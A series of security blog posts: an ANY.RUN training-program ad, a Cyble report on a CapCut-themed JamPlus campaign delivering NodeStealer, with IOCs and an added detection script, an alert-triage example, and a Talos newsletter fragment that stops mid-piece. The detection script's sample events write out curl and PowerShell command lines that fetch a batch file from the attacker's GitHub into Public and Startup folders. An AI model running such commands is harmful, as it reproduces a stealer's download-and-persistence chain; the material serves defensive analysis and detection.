Security Training Lab: Educational Program for Universities

At ANY.RUN, we’ve spent over 8 years tackling cybersecurity industry challenges. We built an interactive sandbox and Threat Intelligence Lookup to streamline malware analysis and investigations for hundreds of thousands of professionals worldwide.

Now, we’re launching Security Training Lab to address another critical need: equipping future cybersecurity professionals with the skills they need to succeed. 

What is Security Training Lab 

Cyber threats evolve at a rapid pace, making it tough for universities to keep their cybersecurity programs current. Security Training Lab empowers universities to tackle this problem by bridging the gap between theory and practice in cybersecurity education.  

The program provides instructors with the tools and resources they need to train students on actual threats, ensuring they graduate with the skills and knowledge to be effective cybersecurity professionals. 

Recognizing the value of hands-on experience, our program offers real-world threat simulations and labs using ANY.RUN’s interactive malware sandbox. This gives both teachers and students a safe place to analyze and study actual cyber threats. 

By working with real samples of malware and phishing attacks, students will get valuable practical experience in identifying and understanding different types of attacks. The hands-on training will help them develop the skills to detect, investigate, and respond to real-world cyber threats, making them more confident in their abilities. 



Key advantages of Security Training Lab 

30 Hours of Academic Content: Includes written materials, video lectures, interactive tasks, and tests to provide a well-rounded learning experience. 

Access to ANY.RUN Sandbox: Teacher and team licenses for students, ensuring everyone has access to the necessary tools and resources. 

Practical Learning: Through real-world threat samples and labs, students gain hands-on experience in analyzing and mitigating cyber threats. 

Easy-to-Use Management Platform: A dedicated platform, powered by Seturon, for monitoring student progress, making it simple for educators to track performance and outcomes. 

Private Discord Community: A vibrant community for students with tips, lifehacks, and the latest news in cybersecurity, fostering collaboration and knowledge sharing. 

On-Demand Integration: Seamless integration with popular Learning Management Systems (LMS), making it easy to incorporate the program into existing curricula. 

What Security Training Lab includes 

The program is structured into ten modules, each focusing on a critical aspect of malware analysis.

Module | Description
Introduction | Gain basic knowledge about different types of analysis and malware, which is crucial for understanding subsequent analysis methods. You will also learn how to use ANY.RUN and other key tools.
Static Analysis | Study the structure of PE files, strings, hashes, and other static characteristics without executing the file. This includes analysis of WinAPI functions and use of tools for static analysis.
Encryption Algorithms | Learn about the encryption methods used by malware to hide its data and actions. It includes the study of algorithms such as RC4, XOR, AES, RSA, and others.
Advanced Static Analysis | Explore in-depth static analysis, including assembly language, advanced tools, and the programming languages commonly used in malware.
Malware Capabilities | Examine various tactics and techniques that malware uses to conceal its presence, steal data, and protect itself from analysis.
Dynamic Analysis | Observe the behavior of malware in real-time using dynamic analysis tools.
Advanced Dynamic Analysis | Learn to analyze malware behavior, including with the use of debuggers and other advanced tools to monitor code execution.
Script Analysis | Study malicious scripts, their obfuscation methods, and analysis.
Analysis of Office Files | Discover methods for analyzing malicious macros and other threats contained in office files.
Terms and Explanations | The final module, containing explanations of terms and concepts used in the course.

Benefits for universities 

Close the expertise gap 

Leverage the expertise of our malware analysts via a comprehensive cybersecurity course. Our program allows universities to deliver a modern curriculum that meets industry standards without the burden of recruiting specialized faculty. 

Improve training 

Provide hands-on experiences that make your cybersecurity program engaging and relevant. Real-world simulations and labs help students apply theory in practice, enhancing their learning and preparing them to handle actual threats. 

Manage the course with ease 

Use our dedicated platform to monitor student performance to simplify administrative tasks and gain clear insights into each student’s progress. The platform provides tools for tracking assignments, assessing learning outcomes, and identifying areas where students may need additional support. 

Benefits for students 

Develop in-demand skills 

The program offers the critical skills employers are looking for, making you more competitive in the job market. By mastering the latest techniques and tools in malware analysis, you’ll be well-prepared to tackle real-world cybersecurity challenges. 

Gain practical experience 

Working with actual examples of cyber threats helps you understand the complexity and diversity of attacks. The practical experience is invaluable for developing the skills needed to detect, investigate, and neutralize cyber threats effectively. 

Receive a certificate and a discount 

Upon completion, students will receive a LinkedIn certificate. We will also provide exclusive student discounts for course graduates. 

Join community 

Connect and collaborate with peers in our private Discord community. Participate in a supportive environment where you can share knowledge, ask questions, and learn from others. 

Integrate Security Training Lab 

Interested in bringing Security Training Lab to your educational institution?  

Send us a message and our team will get in touch to discuss your specific needs and provide a customized quote. 

Get a quote for your academic institution

The post Security Training Lab: Educational Program for Universities appeared first on ANY.RUN’s Cybersecurity Blog.


Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC)

Key takeaways


Cyble Research and Intelligence Labs (CRIL) has detected a phishing site masquerading as a CapCut download page. The site aims to trick users into downloading malicious software.

Threat actors (TAs) have leveraged a reputation-hijacking technique by embedding a legitimate CapCut-signed application within the malicious downloaded package, exploiting the trustworthiness of well-known apps to bypass security systems.

This campaign utilizes a recently demonstrated proof-of-concept (PoC) that repurposes the JamPlus build utility to execute malicious scripts while evading detection.

The attack unfolds in multiple stages, employing a mix of legitimate tools, fileless methods, and reputed code repositories such as GitHub to seem legitimate and effectively circumvent traditional security measures.

This campaign’s final payload is a variant of NodeStealer, designed to capture sensitive user information and exfiltrate it through a Telegram channel.

Overview

CapCut, a video editing tool developed by Bytedance, has become increasingly popular. This popularity has extended to CapCut-themed attacks, which are on the rise among TAs. These themes have been frequently used in phishing campaigns. Cyble Research & Intelligence Labs (CRIL) previously identified several phishing websites impersonating the CapCut video editor, and we have discussed these findings in our earlier blog posts. Our latest research discovers a new CapCut-themed campaign deploying stealers such as NodeStealer.

Additionally, TAs have adopted a recently identified technique of reputation hijacking with the JamPlus build utility to deliver final payloads to victims’ systems. This new tactic highlights an evolving trend in attack strategies aimed at bypassing security controls and increasing the success rate of malicious campaigns.

The initial infection occurs when a user downloads a malicious package from a CapCut phishing site. The package contains a legitimate CapCut application, the JamPlus build utility, and a malicious “.lua” script. When the user runs the legitimate CapCut application, it triggers the JamPlus build utility, which then executes the malicious “.lua” script. This process uses reputation hijacking to mask the execution of the malicious script. The script then downloads a batch file that in turn fetches and executes the final payload from a remote server. The TAs aim to keep payloads fileless wherever possible.

This multi-stage process ultimately deploys a stealer payload that resembles NodeStealer. The image below provides an overview of the infection chain.

Technical Details

In this campaign, TAs trick users into downloading a malicious package disguised as a CapCut installer from a phishing site, as shown below.

When the user clicks the “Download” button on the phishing site, it initiates the download of an archive named “CapCut_{random number}_Installer” from the URL: “hxxps://www[.]dropbox[.]com/scl/fi/6se0kgmo7sbngtdf8r11x/CapCut_7376550521366298640_installer.zip?rlkey=7fxladl3fdhpne6p7buz48kcl&st=pzxtrcqc&dl=1”.


 

Upon extracting the downloaded archive, the user encounters what appears to be a CapCut installer; however, it is a legitimate CapCut application rather than an installer, as shown in Figure 3. The package also includes hidden files intended for malicious activities.

After revealing the hidden files, we discovered that the package contains the JamPlus build utility and a malicious “.lua” script, as shown below.

By default, launching the CapCut shortcut from the desktop runs the CapCut application located at “C:\Users\<User_Name>\AppData\Local\CapCut\Apps\capcut.exe”. This “capcut.exe” file identifies the latest CapCut application version and then executes the appropriate application from the corresponding folder, as shown below.

In this campaign, the TAs leveraged this behavior by attempting to execute a renamed JamPlus build utility in place of the actual CapCut application, as shown below.

In our tests, the JamPlus utility was not executed because the file did not have the expected name, “capcut.exe,” indicating a possible error by the TA in naming the file. However, renaming the file to “capcut.exe” successfully triggers the execution of the JamPlus Build utility.

Upon successful execution, the builder reads instructions from a “.jam” file, which is configured to identify the malicious “.lua” script, as shown below.

After identifying the malicious “.lua” script, the JamPlus build utility loads the “.lua” script file, which executes a shell command, as shown in the figure below. This command employs “curl” to silently download a batch file from a remote server and save it as “C:\Users\Public\steal.bat”. It then executes the downloaded batch file.

This approach demonstrates how TAs utilized a legitimate CapCut application with JamPlus build utility to evade Smart App Control and avoid triggering security alerts.

The batch file contains multiple PowerShell commands that perform the following actions:

1. Downloads a file named “WindowSafety.bat” from a remote URL “hxxps://raw[.]githubusercontent.com/LoneNone1807/batman/main/startup” and saves it in the startup folder, ensuring it runs automatically at the next system startup.

2. Downloads a ZIP file named “Document.zip” from another remote URL “hxxps://github[.]com/LoneNone1807/batman/raw/main/Document.zip” and saves it in the public directory (“C:\Users\Public\Document.zip”).

3. Extracts the contents of “Document.zip” into a folder named “Document” within the public directory (“C:\Users\Public\Document”).

4. Finally, the batch script executes a Python script named “sim.py”, located in the extracted folder.

The image below shows the contents of the Python script.

The newly launched Python script retrieves base64-encoded data from a new remote server, as highlighted in the above image, decodes it, and executes the resulting payload directly in memory without saving it to disk. This payload is a Python-based information-stealing malware identified as NodeStealer.

NodeStealer

NodeStealer is a sophisticated malware that targets a wide range of sensitive data on a victim’s machine. It steals login credentials, cookies, credit card details, and autofill data from both Chromium-based and Gecko-based web browsers. Additionally, it extracts information from Facebook Ads Manager, Facebook Business accounts, and Facebook API graph pages. NodeStealer also targets browser extensions, including crypto wallets, password managers, VPNs, and gaming applications. All the collected information is then exfiltrated to the TAs via Telegram. This attack has been attributed to a threat actor operating from Vietnam.

Broader pattern of attacks

We have also identified another campaign where TAs used similar techniques to deliver RedLine Stealer. In this campaign, they employed a legitimately signed Postman application in conjunction with the JamPlus build utility. The image below shows that the malicious package includes the Postman application.

Conclusion

The successful hijacking of reputable applications and the JamPlus build utility illustrates a sophisticated method for bypassing Smart App Control without triggering security alerts. This approach significantly elevates the complexity and effectiveness of cyberattacks, complicating detection and defense efforts. The deployment of NodeStealer, which targets sensitive information from the victim’s system, highlights the growing concerns and difficulties within the cybersecurity landscape.

Recommendations


Before accessing or downloading from any site, it is essential to diligently verify the URLs.

Consider disabling or limiting the execution of scripting languages on user workstations and servers if they are not essential for legitimate purposes.

Implement comprehensive monitoring and logging to detect unusual activities associated with reputable applications.

Employ application whitelisting to ensure that only approved applications can run on systems. This helps prevent unauthorized applications from executing.

Stay updated with the latest threat intelligence and cybersecurity trends to understand new tactics and techniques used by attackers. This knowledge helps in adapting defense strategies accordingly.

Set up network-level monitoring to detect unusual activities or data exfiltration by malware. Block suspicious activities to prevent potential breaches.

MITRE ATT&CK® Techniques

Tactic | Technique | Description
Initial Access (TA0027) | Phishing (T1660) | Malware distribution via phishing site
Execution (TA0002) | User Execution (T1204) | The user needs to manually execute the file downloaded from the phishing site.
Execution (TA0002) | Python (T1059.006) | Python stealer is used for targeting Windows users
Defense Evasion (TA0005) | Masquerading (T1036.008) | Downloads file disguised as a legitimate application.
Credential Access (TA0006) | Steal Web Session Cookie (T1539) | Steals browser cookies
Collection (TA0009) | Archive Collected Data (T1560) | Stealer compresses the stolen data with ZIP extension.
Exfiltration (TA0010) | Exfiltration Over Web Service (T1567) | Uses Telegram channel to exfiltrate data

Indicators of Compromise (IOCs)

Indicator | Type | Description
8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f | SHA256 | CapCut_7376550521366298640_installer.zip
4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10 | SHA256 | JamPlus Builder – POC file
56d3ba2b661e8d8dfe38bcef275547546b476c35d18aa4ec89eea73c2e2aeb7c | SHA256 | Python Stealer
hxxps://raw[.]githubusercontent[.]com/LoneNone1807/batman/main/steal[.]bat | URL | Remote server
hxxps://cap-cutdownload[.]com/ | URL | Phishing site
169f7d182f7838b75737c23e1b08c4b6b303d2d6a1cb73cdb87bd9644878a027 | SHA256 | Copyright-infringement-images.zip
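The following script is an added example, not Cyble’s code, showing how a defender might operationalise this report. It carries the SHA256 values and defanged URLs from the IOC table above, and encodes the steps of the infection chain from the Technical Details section (a renamed binary started under the CapCut name, curl dropping a batch file under C:\Users\Public, PowerShell pulling from GitHub into the Startup folder, a Python interpreter running out of C:\Users\Public\Document) as rules over Sysmon-style process-creation events. The events and proxy log lines are constructed, and the OriginalFileName value used for the renamed JamPlus utility is an assumption rather than a value from the report.

```python
"""Detection logic for the CapCut/JamPlus chain and the report's IOCs.
Added example; IOC values come from the report, everything else is constructed."""
from typing import Dict, List, Optional, Tuple

# IOCs copied from the report's table: SHA256 -> description, plus defanged URLs.
IOC_SHA256: Dict[str, str] = {
    "8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f": "CapCut_7376550521366298640_installer.zip",
    "4e213bd0a127f1bb24c4c0d971c2727097b04eed9c6e62a57110d168ccc3ba10": "JamPlus Builder - POC file",
    "56d3ba2b661e8d8dfe38bcef275547546b476c35d18aa4ec89eea73c2e2aeb7c": "Python Stealer",
    "169f7d182f7838b75737c23e1b08c4b6b303d2d6a1cb73cdb87bd9644878a027": "Copyright-infringement-images.zip",
}
IOC_URLS_DEFANGED = [
    "hxxps://raw[.]githubusercontent[.]com/LoneNone1807/batman/main/steal[.]bat",
    "hxxps://cap-cutdownload[.]com/",
]


def refang(ioc: str) -> str:
    """Turn a defanged IOC back into the real string so it can be matched in logs."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


IOC_URLS = [refang(u).lower() for u in IOC_URLS_DEFANGED]
PUBLIC_DIR = r"c:\users\public"
STARTUP_DIR = r"\microsoft\windows\start menu\programs\startup"


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: dict) -> List[str]:
    """Apply the chain-specific rules to one process-creation event (Sysmon-like fields)."""
    image = _basename(ev.get("image", ""))
    parent = _basename(ev.get("parent_image", ""))
    orig = ev.get("original_file_name", "").lower()
    cmd = ev.get("command_line", "").lower()
    hits = []
    # R1: the CapCut launcher started a file named capcut.exe whose PE metadata is not CapCut's
    #     (the report describes the renamed JamPlus utility standing in for the real application).
    if image == "capcut.exe" and parent == "capcut.exe" and orig and orig != "capcut.exe":
        hits.append("renamed-binary-under-capcut-name")
    # R2: curl writing a .bat under C:\Users\Public (steal.bat in the report).
    if image == "curl.exe" and PUBLIC_DIR in cmd and ".bat" in cmd:
        hits.append("curl-drops-bat-in-public")
    # R3: PowerShell fetching from GitHub into the Startup folder or C:\Users\Public.
    if image == "powershell.exe" and "github" in cmd and (STARTUP_DIR in cmd or PUBLIC_DIR in cmd):
        hits.append("powershell-github-download-to-persistence-path")
    # R4: a Python interpreter running a script out of C:\Users\Public\Document (sim.py).
    if image.startswith("python") and PUBLIC_DIR + r"\document" in cmd:
        hits.append("python-from-public-document")
    return hits


def detect(events: List[dict]) -> List[Tuple[int, str]]:
    return [(ev["pid"], hit) for ev in events for hit in check_event(ev)]


def match_hash(sha256_hex: str) -> Optional[str]:
    return IOC_SHA256.get(sha256_hex.strip().lower())


def scan_proxy_log(lines: List[str]) -> List[str]:
    """Lines that contain one of the report's URLs. Full-URL match on purpose:
    matching the raw.githubusercontent.com host alone would flag all GitHub traffic."""
    return [ln for ln in lines if any(u in ln.lower() for u in IOC_URLS)]


SAMPLE_EVENTS = [  # constructed; original_file_name "jam.exe" for the renamed utility is an assumption
    {"pid": 1, "image": r"C:\Users\u\Downloads\CapCut\capcut.exe", "original_file_name": "CapCut.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "capcut.exe"},
    {"pid": 2, "image": r"C:\Users\u\Downloads\CapCut\Apps\1.0.0\capcut.exe", "original_file_name": "jam.exe",
     "parent_image": r"C:\Users\u\Downloads\CapCut\capcut.exe", "command_line": "capcut.exe"},
    {"pid": 3, "image": r"C:\Windows\System32\curl.exe", "original_file_name": "curl.exe",
     "parent_image": r"C:\Users\u\Downloads\CapCut\Apps\1.0.0\capcut.exe",
     "command_line": r"curl -s -o C:\Users\Public\steal.bat https://raw.githubusercontent.com/LoneNone1807/batman/main/steal.bat"},
    {"pid": 4, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "original_file_name": "PowerShell.EXE",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"powershell -c Invoke-WebRequest https://raw.githubusercontent.com/LoneNone1807/batman/main/startup -OutFile 'C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WindowSafety.bat'"},
    {"pid": 5, "image": r"C:\Users\Public\Document\python.exe", "original_file_name": "python.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe", "command_line": r"python.exe C:\Users\Public\Document\sim.py"},
    {"pid": 6, "image": r"C:\Windows\System32\curl.exe", "original_file_name": "curl.exe",  # benign control
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": r"curl -o C:\Users\u\Downloads\report.pdf https://www.example.com/report.pdf"},
]
SAMPLE_PROXY_LOG = [  # constructed
    "2024-09-02T10:00:01Z 10.0.0.5 GET https://www.example.com/ 200",
    "2024-09-02T10:00:07Z 10.0.0.5 GET https://cap-cutdownload.com/ 200",
    "2024-09-02T10:00:42Z 10.0.0.5 GET https://raw.githubusercontent.com/LoneNone1807/batman/main/steal.bat 200",
]

if __name__ == "__main__":
    for pid, rule in detect(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule}")
    for line in scan_proxy_log(SAMPLE_PROXY_LOG):
        print("IOC URL hit:", line)
    print(match_hash("8e6bbe8ac1ecdd230a4dcafa981ff00663fae06f7b85b117a87917b6f04f894f"))
```

Rules R1 to R4 each cover one link of the chain; in a SIEM the useful alert is the sequence of them from one host within a few minutes, which is far harder to trip by accident than any single rule, and R1 is the one that survives if the TAs fix the file-naming error the report describes.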


The post Reputation Hijacking with JamPlus: A Maneuver to Bypass Smart App Control (SAC) appeared first on Cyble.


Understanding Threat Intelligence Benefits for a Business

Editor’s Note: This is an edited version of an article originally posted in October 2023. It has been updated with some new information about ANY.RUN’s threat intelligence products.

As a business owner, you’ve likely invested in a range of security tools like SIEMs, antivirus software, and IDS/IPS systems to safeguard your operations.  

You might even have a dedicated cybersecurity team that monitors your systems and responds to incidents such as a SOC (Security Operations Center) or a DFIR (Digital Forensics and Incident Response) team. 

But here’s the question: Are your teams equipped to go beyond simply reacting to cybersecurity incidents? If your company underutilizes threat intelligence, chances are they’re not. 

Understanding the role of Cyber Threat Intelligence  

Cyber threat intelligence involves collecting, analyzing, and interpreting data on potential or current cybersecurity threats. It plays an important role in helping organizations detect and prevent cyberattacks by offering insights into adversaries’ tactics, techniques, and procedures (TTPs).  

CTI spans a wide range of activities, from identifying malware variants to monitoring trends in cybercrime, and it involves the use of specialized tools to protect against evolving threats. 

Types of threat intelligence tools 

Category | Primary Use Cases | Primary Consumers
Threat Intelligence Feeds | Expand threat coverage of your security systems like SIEMs, firewalls, and IPS/IDS with the latest IOCs. | 1. SOC Team; 2. Incident Response Team
Threat Intelligence Lookup | Provide linked, contextual data around indicators, allowing analysts to query databases for known IOCs such as malicious IPs, URLs, or file hashes. | 1. SOC Team; 2. Threat Analysts
Sandboxing Solutions | Analyze suspicious files or URLs in isolated environments to understand their behavior and impact. | 1. SOC Team; 2. Threat Analysts
Aggregation Platforms | Enable analysts to combine multiple threat feeds for analysis and correlation, enhancing decision-making during an incident. | 1. SOC Team; 2. Threat Intelligence Analysts
Threat Sharing Platforms | Facilitate the sharing of structured threat information within a community or organization. | 1. Threat Intelligence Team; 2. SOC Team

Keep in mind that internal organizational structures differ among companies. Your team names and responsibilities may vary, but the table above should give you a solid understanding of who typically uses which threat intelligence tools and for what purpose. 



What happens in teams that don’t have threat intelligence 

Without threat intelligence tools, your teams are essentially flying blind. Consider a situation where a suspicious artifact shows up in your system logs, like an unfamiliar IP address. How does the SOC team immediately identify what this IP means and how to address it effectively? 

In short, without threat intelligence, they can’t. 

Manual research will be needed instead, requiring the team to pull data from various open-source sources to understand the threat. This process takes time, and time is something you can’t afford to lose during an active attack. 

One of the primary goals of threat intelligence is to provide context for artifacts and indicators. Linking an IOC to a specific threat and then to TTPs helps the team understand the exact steps needed to counter the threat. 

ANY.RUN’s Threat Intelligence Lookup changes that by delivering real-time contextual data, allowing your teams to link IOCs to threats and threat actor tactics, techniques, and procedures (TTPs) quickly and effectively. Instead of sifting through disparate sources, teams can get actionable insights instantly. 

Threat Intelligence Benefits for a Business 

But the benefits don’t stop there. Here are 7 more reasons why threat intelligence is crucial for a strong security posture:

1. Reducing the risk of successful cyberattack 

Reducing attack risk is a key advantage of threat intelligence. Your SOC team can use real-time threat feeds to get ahead of new threats and deepen their knowledge of TTPs and IOCs. 

The data helps in proactively adjusting firewall rules, IDS/IPS signatures, and other security measures, making your defenses stronger. At the same time, the incident response team gains valuable context about attacks, speeding up containment and removal. 

2. Preventing Financial Loss 

According to IBM, the average cost of a data breach in 2023 is $4.45 million. Finding and containing a breach usually takes months, making prevention a top priority. 

Threat intelligence helps your SOC team spot phishing campaigns, fraud attempts, and data exfiltration risks. This protects both financial assets and customer data. By doing this, you avoid expensive breaches, regulatory fines, and the erosion of customer trust that financial setbacks bring. 

3. Improving security operations and detection accuracy 

Alert fatigue happens when too many alerts overwhelm security specialists, causing them to miss genuine threats. This is often due to frequent false positives and lack of prioritization. 

Threat intelligence allows SOC analysts to sort alerts by relevance and risk. They can zero in on high-fidelity alerts that truly matter, cutting down on the noise from low-level threats. This focus lets the team fine-tune IDS/IPS signatures and craft better correlation rules for SIEM systems. The result is a more efficient SOC, with fewer false positives and faster threat identification. 
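As an added example (not ANY.RUN’s code) of the enrichment and prioritisation described in this section and under “What happens in teams that don’t have threat intelligence” above: a local threat-intelligence store stands in for a lookup service, each alert’s indicator is resolved to a malware family and its ATT&CK TTPs, and a score combining indicator confidence, asset criticality and a known-false-positive allowlist orders the queue. All indicators, TI records, alerts and the scoring weights are constructed.

```python
"""Enrich raw SOC alerts from a local TI store and rank them by relevance and risk.
Added example; the TI records, alerts, allowlist and weights are constructed."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed local TI store: indicator -> the context a TI lookup would return.
TI_STORE: Dict[str, dict] = {
    "203.0.113.7": {"family": "ExampleStealer", "role": "c2", "confidence": 90, "ttps": ["T1567", "T1539"]},
    "bad-update.example": {"family": "ExampleLoader", "role": "download", "confidence": 70, "ttps": ["T1204", "T1059.006"]},
    "ab" * 32: {"family": "ExampleStealer", "role": "payload", "confidence": 95, "ttps": ["T1539", "T1560"]},
}
# Constructed: an internal scanner whose traffic keeps tripping IDS signatures (known false positive).
ALLOWLIST = {"198.51.100.1"}


@dataclass
class EnrichedAlert:
    alert_id: str
    indicator: str
    family: Optional[str]
    ttps: List[str]
    score: int


def enrich(alert: dict) -> EnrichedAlert:
    """Attach TI context to one alert and compute its priority.
    score = confidence x asset criticality, +50 for a confirmed C2, 0 when allowlisted,
    and a low floor for unknown indicators so they stay in the queue for hunting."""
    ind = alert["indicator"].strip().lower()
    crit = int(alert.get("asset_criticality", 1))
    ctx = TI_STORE.get(ind)
    if ind in ALLOWLIST:
        score = 0
    elif ctx is None:
        score = 10 * crit
    else:
        score = ctx["confidence"] * crit + (50 if ctx["role"] == "c2" else 0)
    return EnrichedAlert(alert["id"], ind, ctx["family"] if ctx else None,
                         list(ctx["ttps"]) if ctx else [], score)


def triage(alerts: List[dict]) -> List[EnrichedAlert]:
    """Highest priority first; ties broken by alert id so the queue order is stable."""
    return sorted((enrich(a) for a in alerts), key=lambda e: (-e.score, e.alert_id))


def ttps_in_play(queue: List[EnrichedAlert], min_score: int = 50) -> List[str]:
    """The TTPs behind the alerts that made the cut: what responders plan against."""
    return sorted({t for e in queue if e.score >= min_score for t in e.ttps})


SAMPLE_ALERTS = [  # constructed; asset_criticality 1 (low) to 3 (crown jewels)
    {"id": "A1", "indicator": "203.0.113.7", "asset_criticality": 3},
    {"id": "A2", "indicator": "bad-update.example", "asset_criticality": 1},
    {"id": "A3", "indicator": "198.51.100.1", "asset_criticality": 2},
    {"id": "A4", "indicator": "192.0.2.44", "asset_criticality": 2},
    {"id": "A5", "indicator": "AB" * 32, "asset_criticality": 1},
]

if __name__ == "__main__":
    queue = triage(SAMPLE_ALERTS)
    for e in queue:
        print(f"{e.score:4d} {e.alert_id} {e.indicator[:24]:24} {e.family} {e.ttps}")
    print("TTPs in play:", ttps_in_play(queue))
```

The unknown indicator (A4) is deliberately not dropped: an indicator absent from the store is exactly the case the article calls “flying blind”, and keeping it at a low score is how it gets picked up by threat hunting rather than lost in the noise.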

4. Managing vulnerability more accurately 

Your vulnerability management team can use threat intelligence to smartly prioritize patches. Instead of wasting time on low-risk vulnerabilities, they can focus on those actively targeted or with known exploits. 

Threat intelligence also guides the creation and updating of secure configuration baselines. This data-driven strategy ensures you’re actually shrinking your attack surface, not just ticking boxes. 

5. Refining risk analysis  

Your risk management team can enhance their risk assessments by incorporating threat intelligence. This gives them a real-time, nuanced view of threats, beyond just historical data or industry benchmarks. They can factor in current events like emerging APTs or zero-days to better gauge risk impact and attack likelihood. 

This alignment with the current threat landscape improves decision-making for resource allocation, policy setting, and incident response planning. 

6. Improving threat hunting capabilities 

Threat intelligence provides crucial insights into the tactics, techniques, and procedures (TTPs) used by attackers, allowing threat hunters to be more proactive. By understanding these methods, your security teams can actively seek out potential threats before they escalate into full-blown incidents. This proactive approach enables faster detection of anomalous behaviors, reducing the time an adversary can stay in your network undetected. 

7. Learning from real-world examples 

TI Lookup allows teams to learn more about threat behavior by instantly accessing real-world dynamic analysis. This gives your business access to up-to-date examples of how threats operate, helping security teams better understand malware behavior and strengthen their defenses accordingly. 

How Threat Intelligence Lookup Enhances Your Company’s Defense 

Threat Intelligence Lookup services, like ANY.RUN’s TI Lookup, provide a powerful way to connect the dots between seemingly unrelated indicators of compromise. This service will help your team gain a clearer understanding of cybersecurity threats, leading to faster and more informed responses. 



Here’s why you need to implement Threat intelligence lookup tools into your company’s cybersecurity activities: 

Instant context: TI Lookup quickly links important indicators, like IP addresses and file hashes, to known cyber threats, enabling your security team to respond faster to emerging dangers. This saves valuable time and minimizes the risk of costly incidents.

TI Lookup search in ANY.RUN

Advanced OS artifacts: ANY.RUN’s TI Lookup goes beyond surface-level IOCs, providing detailed visibility into OS artifacts, including command lines, registry changes, and mutexes. These insights equip your business with the deeper information needed to investigate complex security threats effectively. 

Malware detection with YARA search: By applying YARA rules, TI Lookup can help your team detect malware variants based on file content, making it easier to identify similar malicious samples in your infrastructure. 

Yara Search in TI Lookup

Suricata network protection: TI Lookup integrates Suricata detection rules to track network-based threats, identifying malicious traffic patterns that could otherwise go unnoticed. This means your business is shielded from cyberattacks using the latest network defense strategies. 

Suricata rules in TI Lookup

Real-world threat intelligence: Data from live, interactive sessions in TI Lookup ensures that your security team deals with up-to-date, actionable intelligence. This leads to more informed decision-making and quicker mitigation of ongoing threats. 

C2 locations lookup: ANY.RUN’s geolocation feature allows users to track and visualize Command and Control (C2) server origins on a live map. By identifying malware families associated with these C2 servers and accessing relevant analysis sessions, your team can filter results based on geography or malware type, making it easier to understand and counter threats targeting your organization. 

Malware popularity tracking: ANY.RUN’s malware family tracking feature provides real-time insights into trending malware. You can monitor shifts in malware popularity, easily extract fresh IOCs, and analyze which regions are most affected by specific threats, helping adjust defenses accordingly. 

Malware family popularity tracking in TI Lookup

Wrapping up

As you can see, threat intelligence offers multiple business benefits. To sum up, it: 

Lowers the chance of successful attacks 

Helps prevent or cut down financial losses 

Boosts the efficiency and accuracy of security operations 

Enables precise vulnerability management 

Enhances risk analysis 

Interested in expanding your threat coverage? 

Right now, you can integrate ANY.RUN’s Threat Feeds to receive the latest IOCs directly from ANY.RUN’s sandbox. They are pre-processed and filtered for false positives.

You can also utilize Threat Intelligence Lookup to speed up your investigations by contextualizing your alerts or artifacts with more information on the malware family and its TTPs, extra IOCs, samples, etc. from our large repository of threat data.

Contact sales to get a 14-day free trial and discover how you can strengthen your company’s cybersecurity today. 


 Stay tuned for more exciting updates!   

The post Understanding Threat Intelligence Benefits for a Business appeared first on ANY.RUN’s Cybersecurity Blog.


The best and worst ways to get users to improve their account security

As most quality thoughts go, my most recent musing on security came about because of fantasy football. 

I had to log into my Yahoo Sports account, which I admittedly only ever have to log in to, at most, three times a year for the one fantasy football draft I have on that platform each year and then the handful of other times my phone logs me out during the five months that I’m adjusting my lineups on a weekly basis.  

Admittedly, I’d never thought much about the security of my Yahoo Sports account because I don’t have any sensitive information tied to it, and if someone did want to break in, they could probably do a better job of managing my team in that league than I have the past few years. It’s the old “out of sight, out of mind” compared to something like my work email account where I’m logging in every morning, or online banking which I’m using several times a week, and the knowledge that my financial wellbeing is tied to those account credentials. 

But I have to give credit to Yahoo for how they handled my account being less secure. When I logged in, probably for the first time since January, this weekend, before it would even display my homepage or enter the fantasy draft, it took me to an account management page where it warned me that I was using a “less secure” password and still hadn’t enrolled in multi-factor authentication. It took me less than a minute to update my password to something more secure, and maybe another two minutes to enroll in passcode MFA. 

The account management page also had some helpful information, such as how long it had been since my last password change, offering the ability to manage my password through a third-party app, and multiple options to set up MFA, including using the Yahoo Sports app directly (this is always more appealing to me than having to download yet another MFA app on my phone). 

This also got me thinking about the ways in which I don’t like being asked or reminded to enroll in MFA. It never made any sense to me that sites would give users the option to click away from the screen when being asked to enroll in MFA — make it mandatory or don’t. Also, one of my biggest pet peeves in using the internet is when you confirm this is a personal device or “Remember Me” for the next time I log in and the site doesn’t, in fact, remember me, and I have to go through the same approval process multiple times in the same day. 

Our friends at Cisco Duo also have a few other great recommendations for getting people to enroll in MFA, but in my opinion, mandatory enrollment is best enrollment. If I had never displayed that screen on Yahoo’s login page, I wouldn’t have even thought twice about how secure my account was. And seeing a red “!” next to my password gave off an immediate sign that my password needed to be improved, which is something I wish other sites would start doing.  

It’s not like having my fantasy football login credentials compromised would be the end of the world, but when it comes to something more high stakes, there are a few small UI steps sites could take to help nudge us in the right direction. 

The one big thing 

Threat actors are increasingly using a traditional Red Teaming tool called MacroPack to create new malware payloads. These malicious files deliver multiple payloads, including the Havoc and Brute Ratel post-exploitation frameworks and a new variant of the PhantomCore remote access trojan (RAT). Several different actors are using this tactic based on files uploaded to VirusTotal that Talos analyzed. They are written in different languages and rely on different themes centered on different geographies, which leads us to believe these are disparate campaigns.  

Why do I care? 

The threat of VBA macros has diminished since Microsoft blocked the execution of macros in Microsoft Office documents downloaded from the internet, but not all users run the latest Office versions, so they can still be vulnerable. MacroPack can generate several types of payloads packaged into different file types, including popular Office-supported formats, scripting files and shortcuts. The code generated by the framework has the following characteristics, making it more difficult to detect using file content signatures. 

So now what? 

